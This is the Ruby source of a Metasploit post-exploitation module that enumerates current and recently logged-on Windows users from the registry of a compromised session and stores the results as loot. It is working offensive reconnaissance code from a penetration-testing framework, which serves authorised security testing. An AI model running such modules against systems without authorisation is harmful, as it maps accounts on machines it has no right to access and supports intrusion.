Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::Windows::Accounts
8
  include Msf::Post::Windows::Registry
9
  include Msf::Post::Windows::UserProfiles
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Windows Gather Logged On User Enumeration (Registry)',
16
        'Description' => %q{ This module will enumerate current and recently logged on Windows users. },
17
        'License' => MSF_LICENSE,
18
        'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
19
        'Platform' => [ 'win' ],
20
        'SessionTypes' => %w[powershell shell meterpreter],
21
        'Notes' => {
22
          'Stability' => [CRASH_SAFE],
23
          'Reliability' => [],
24
          'SideEffects' => []
25
        },
26
        'Compat' => {
27
          'Meterpreter' => {
28
            'Commands' => %w[
29
              stdapi_railgun_api
30
            ]
31
          }
32
        }
33
      )
34
    )
35
    register_options([
36
      OptBool.new('CURRENT', [ true, 'Enumerate currently logged on users', true]),
37
      OptBool.new('RECENT', [ true, 'Enumerate recently logged on users', true])
38
    ])
39
  end
40

41
  def list_recently_logged_on_users
42
    tbl = Rex::Text::Table.new(
43
      'Header' => 'Recently Logged Users',
44
      'Indent' => 1,
45
      'Columns' =>
46
      [
47
        'SID',
48
        'Profile Path'
49
      ]
50
    )
51

52
    profiles = read_profile_list(user_accounts_only: false)
53

54
    return if profiles.blank?
55

56
    profiles.each do |profile|
57
      tbl << [
58
        profile['SID'],
59
        profile['PROF']
60
      ]
61
    end
62

63
    return if tbl.rows.empty?
64

65
    print_line("\n#{tbl}\n")
66
    p = store_loot('host.users.recent', 'text/plain', session, tbl.to_s, 'recent_users.txt', 'Recent Users')
67
    print_good("Results saved in: #{p}")
68
  end
69

70
  def list_currently_logged_on_users
71
    return unless session.type == 'meterpreter'
72

73
    tbl = Rex::Text::Table.new(
74
      'Header' => 'Current Logged Users',
75
      'Indent' => 1,
76
      'Columns' =>
77
      [
78
        'SID',
79
        'User'
80
      ]
81
    )
82
    keys = registry_enumkeys('HKU')
83

84
    return unless keys
85

86
    keys.each do |maybe_sid|
87
      next unless maybe_sid.starts_with?('S-1-5-21-')
88
      next if maybe_sid.ends_with?('_Classes')
89

90
      info = resolve_sid(maybe_sid)
91

92
      next if info.nil?
93

94
      name = info[:name]
95
      domain = info[:domain]
96

97
      next if domain.blank? || name.blank?
98

99
      tbl << [maybe_sid, "#{domain}\\#{name}"]
100
    end
101

102
    return if tbl.rows.empty?
103

104
    print_line("\n#{tbl}\n")
105
    p = store_loot('host.users.active', 'text/plain', session, tbl.to_s, 'active_users.txt', 'Active Users')
106
    print_good("Results saved in: #{p}")
107
  end
108

109
  def run
110
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
111
    print_status("Running module against #{hostname} (#{session.session_host})")
112

113
    if datastore['CURRENT']
114
      if session.type == 'meterpreter'
115
        list_currently_logged_on_users
116
      else
117
        print_error("Incompatible session type '#{session.type}'. Can not retrieve list of currently logged in users.")
118
      end
119
    end
120

121
    if datastore['RECENT']
122
      list_recently_logged_on_users
123
    end
124
  end
125
end
126

127